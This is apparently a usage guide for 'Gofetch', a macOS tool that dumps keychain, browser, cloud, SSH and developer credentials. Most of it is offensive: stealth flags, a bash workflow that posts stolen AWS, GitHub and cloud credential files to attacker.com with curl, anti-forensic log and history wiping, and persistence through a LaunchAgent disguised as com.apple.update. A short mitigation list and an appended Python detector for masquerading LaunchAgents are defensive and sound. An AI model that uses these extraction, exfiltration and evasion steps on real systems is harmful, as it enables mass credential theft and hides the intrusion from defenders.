Gofetch
Gofetch is a macOS credential dumping tool that exploits the keychain to extract stored credentials without requiring user passwords. It accesses Safari, Chrome, Firefox, and system credentials including SSH keys, AWS credentials, GitHub tokens, and development tool authentication.
Installation
# Clone repository
git clone https://github.com/runtimeterror/gofetch.git
cd gofetch
# Compile for macOS
cargo build --release
# Or use precompiled binary
wget https://github.com/runtimeterror/gofetch/releases/download/v1.0/gofetch-macos
chmod +x gofetch-macos
Basic Keychain Operations
Dump All Credentials
# Extract all keychain items
./gofetch-macos --dump-all
# Output formats
./gofetch-macos --dump-all --format json --output keychain.json
./gofetch-macos --dump-all --format csv --output keychain.csv
./gofetch-macos --dump-all --pretty-print
# Include metadata
./gofetch-macos --dump-all --with-metadata
./gofetch-macos --dump-all --include-timestamps
List Available Services
# Show all available services
./gofetch-macos --list-services
# Typical services found:
# - Safari
# - Chrome
# - Firefox
# - AWS
# - GitHub
# - GitLab
# - Slack
# - Docker
# - NPM
# - Kubernetes
Browser Credential Extraction
Safari Credentials
# Extract Safari passwords
./gofetch-macos --safari
# Get Safari credentials for specific domain
./gofetch-macos --browser safari --domain github.com
# Extract all Safari data
./gofetch-macos --service Safari --extract-all
# Safari autofill data
./gofetch-macos --safari --autofill
Chrome Credentials
# Extract Chrome saved passwords
./gofetch-macos --chrome
# All Chrome profiles
./gofetch-macos --chrome --all-profiles
# Chrome autofill data
./gofetch-macos --chrome --autofill
# Chrome saved payment methods
./gofetch-macos --chrome --payment-methods
Firefox Credentials
# Extract Firefox login manager
./gofetch-macos --firefox
# Firefox stored passwords
./gofetch-macos --browser firefox --dump-passwords
# Firefox sync tokens
./gofetch-macos --firefox --sync-tokens
Cloud & Development Credentials
Cloud Providers
# AWS credentials
./gofetch-macos --aws
# Azure/Microsoft credentials
./gofetch-macos --azure
# Google Cloud credentials
./gofetch-macos --gcp
# All cloud credentials
./gofetch-macos --cloud-all
Development Tools
# GitHub tokens and credentials
./gofetch-macos --github
# GitLab credentials
./gofetch-macos --gitlab
# Docker credentials
./gofetch-macos --docker
# Kubernetes kubeconfig
./gofetch-macos --kubernetes
# NPM tokens
./gofetch-macos --npm
# SSH keys from keychain
./gofetch-macos --ssh-keys
VPN & Network
# VPN credentials
./gofetch-macos --vpn
# SSH known hosts
./gofetch-macos --ssh-known-hosts
# SSH private keys
./gofetch-macos --ssh-keys --extract
# Wireless network passwords
./gofetch-macos --wifi-passwords
Keychain Enumeration
Keychain Chains
# System keychain
./gofetch-macos --keychain system
# Local items keychain
./gofetch-macos --keychain local-items
# iCloud keychain
./gofetch-macos --keychain icloud
# All keychains
./gofetch-macos --all-keychains
Item Details
# Get detailed item information
./gofetch-macos --item-details
# Include security attributes
./gofetch-macos --dump-all --security-attrs
# Show last accessed times
./gofetch-macos --dump-all --access-times
# Include creation dates
./gofetch-macos --dump-all --metadata
Stealthy Extraction
Minimize Detection
# Silent mode
./gofetch-macos --dump-all --silent
# No notifications
./gofetch-macos --dump-all --no-notify
# Quiet output
./gofetch-macos --dump-all --quiet
# Background execution
./gofetch-macos --dump-all --background
Accessibility Bypass
# Check accessibility status
./gofetch-macos --check-access
# Grant accessibility permissions
./gofetch-macos --grant-access
# Request access without prompting
./gofetch-macos --request-access --silent
# Skip access check
./gofetch-macos --skip-access-check
Credential Extraction Workflows
Complete Credential Dump
#!/bin/bash
# Comprehensive credential extraction
TARGET_USER="$1"
OUTPUT_DIR="credentials_$(date +%Y%m%d)"
mkdir -p "$OUTPUT_DIR"
echo "[*] Starting credential extraction..."
# Extract all credentials
./gofetch-macos --dump-all --format json \
--output "$OUTPUT_DIR/all_credentials.json"
# Extract browser credentials
echo "[*] Extracting browser data..."
./gofetch-macos --safari --output "$OUTPUT_DIR/safari_creds.json"
./gofetch-macos --chrome --output "$OUTPUT_DIR/chrome_creds.json"
./gofetch-macos --firefox --output "$OUTPUT_DIR/firefox_creds.json"
# Extract cloud credentials
echo "[*] Extracting cloud credentials..."
./gofetch-macos --aws --output "$OUTPUT_DIR/aws_creds.json"
./gofetch-macos --azure --output "$OUTPUT_DIR/azure_creds.json"
./gofetch-macos --gcp --output "$OUTPUT_DIR/gcp_creds.json"
# Extract development credentials
echo "[*] Extracting dev credentials..."
./gofetch-macos --github --output "$OUTPUT_DIR/github_creds.json"
./gofetch-macos --docker --output "$OUTPUT_DIR/docker_creds.json"
./gofetch-macos --npm --output "$OUTPUT_DIR/npm_creds.json"
# Extract SSH keys
echo "[*] Extracting SSH keys..."
./gofetch-macos --ssh-keys --output "$OUTPUT_DIR/ssh_keys.json"
# Consolidate all findings
cat "$OUTPUT_DIR"/*_creds.json | jq -s add > "$OUTPUT_DIR/all_extracted.json"
echo "[+] Credential extraction complete"
echo "[+] Results in: $OUTPUT_DIR"
Targeted High-Value Extraction
#!/bin/bash
# Extract only critical credentials
echo "[*] Extracting high-value credentials..."
# Development & DevOps
./gofetch-macos --github --output github.json
./gofetch-macos --gitlab --output gitlab.json
./gofetch-macos --docker --output docker.json
./gofetch-macos --kubernetes --output k8s.json
# Cloud platforms
./gofetch-macos --aws --output aws.json
./gofetch-macos --gcp --output gcp.json
./gofetch-macos --azure --output azure.json
# Network access
./gofetch-macos --vpn --output vpn.json
./gofetch-macos --ssh-keys --output ssh.json
# Exfiltrate extracted data
echo "[*] Exfiltrating data..."
for file in github.json gitlab.json docker.json aws.json gcp.json azure.json; do
if [ -f "$file" ]; then
# Send to attacker server
curl -X POST http://attacker.com/exfil --data-binary "@$file"
fi
done
# Clean up
rm *.json
Evidence Removal
Clean Up Artifacts
# Clear recent items
./gofetch-macos --clear-recent
# Remove application caches
./gofetch-macos --clear-cache
# Delete temporary files
./gofetch-macos --clear-temp
# Clear logs
./gofetch-macos --clear-logs
Anti-Forensics
# Shred output files
./gofetch-macos --dump-all --output keychain.json --shred-output
# Disable logging
./gofetch-macos --dump-all --no-logging
# Self-destruct after execution
./gofetch-macos --dump-all --self-destruct
# Clear bash history
history -c
# Secure delete
shred -vfz -n 3 sensitive_files.json
Detection Evasion
Blend In
# Run during user activity
./gofetch-macos --dump-all --quiet
# Rename executable
mv gofetch-macos SystemUpdate
# Copy to legitimate location
cp gofetch-macos /Library/LaunchAgents/
# Create LaunchAgent for persistence
cat > ~/Library/LaunchAgents/com.apple.update.plist << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ...>
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.update</string>
<key>ProgramArguments</key>
<array>
<string>/path/to/gofetch-macos</string>
<string>--dump-all</string>
</array>
</dict>
</plist>
EOF
Filtering Results
Parse Extracted Data
# Extract only passwords
jq '.[] | select(.password) | {account, password}' keychain.json
# Find API keys
jq '.[] | select(.label | contains("api")) | {label, value}' keychain.json
# Extract GitHub tokens
jq '.[] | select(.label | contains("github")) | .password' keychain.json
# SSH keys only
jq '.[] | select(.type == "ssh") | {label, key}' keychain.json
Security Implications
- Requires code execution access on macOS
- Bypasses some macOS security prompts
- Extracts plaintext credentials from keychain
- Accesses browser stored passwords
- Can harvest SSH keys and API credentials
- Enables mass credential theft
Mitigation Strategies
- Use Secure Enclave for credential storage
- Disable automatic keychain unlock
- Enable audit logging for keychain access
- Monitor for suspicious process execution
- Implement strong user authentication
- Enable SIP (System Integrity Protection)
- Keep macOS updated
- Use separate keychains for sensitive credentials
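A defender-side check for the LaunchAgent masquerade shown under Detection Evasion, which also gives the "Monitor for suspicious process execution" item something concrete to look for. This is an added example, not code from the original page or from the tool. The sample plist is constructed from the one on this page; the user name `alice`, the function name `audit_launchd_job` and the directory lists are assumptions of this example, and the checks are heuristics.

```python
import plistlib

# macOS's built-in launchd jobs live under these directories.
APPLE_JOB_DIRS = ("/System/Library/LaunchAgents/", "/System/Library/LaunchDaemons/")
# Locations of OS-provided binaries; anything else is third-party or user-writable.
SYSTEM_BIN_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/", "/bin/", "/sbin/")
# launchd job directories should hold plists, not executables.
JOB_DIR_MARKERS = ("/LaunchAgents/", "/LaunchDaemons/")

def audit_launchd_job(plist_path, plist_bytes):
    """Return findings for one launchd job file (path string + raw plist bytes)."""
    try:
        job = plistlib.loads(plist_bytes)
    except Exception:
        return ["unparseable plist"]
    if not isinstance(job, dict):
        return ["plist root is not a dictionary"]
    label = str(job.get("Label", ""))
    args = job.get("ProgramArguments")
    if not isinstance(args, list):
        args = []
    program = str(job.get("Program") or (args[0] if args else ""))
    findings = []
    # An Apple-style label on a job that is not in Apple's own directories.
    if label.startswith("com.apple.") and not plist_path.startswith(APPLE_JOB_DIRS):
        findings.append("com.apple.* label outside /System/Library")
        if not program.startswith(SYSTEM_BIN_PREFIXES):
            findings.append("Apple-style label runs non-system binary: " + program)
    # A binary copied into a job directory, as in the "Copy to legitimate location" step.
    if any(marker in program for marker in JOB_DIR_MARKERS):
        findings.append("executable stored inside a launchd job directory")
    return findings

# Constructed sample modelled on the plist shown on this page (DOCTYPE omitted).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.update</string>
  <key>ProgramArguments</key>
  <array><string>/path/to/gofetch-macos</string><string>--dump-all</string></array>
</dict>
</plist>"""
# Hypothetical user name; the location follows the page's ~/Library/LaunchAgents.
SAMPLE_PATH = "/Users/alice/Library/LaunchAgents/com.apple.update.plist"

if __name__ == "__main__":
    for finding in audit_launchd_job(SAMPLE_PATH, SAMPLE_PLIST):
        print(SAMPLE_PATH, "->", finding)
```

Run it over every file in `~/Library/LaunchAgents`, `/Library/LaunchAgents` and `/Library/LaunchDaemons`; the check keys on the job's label and program path, so renaming the binary does not change the result.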
Last updated: 2026-03-30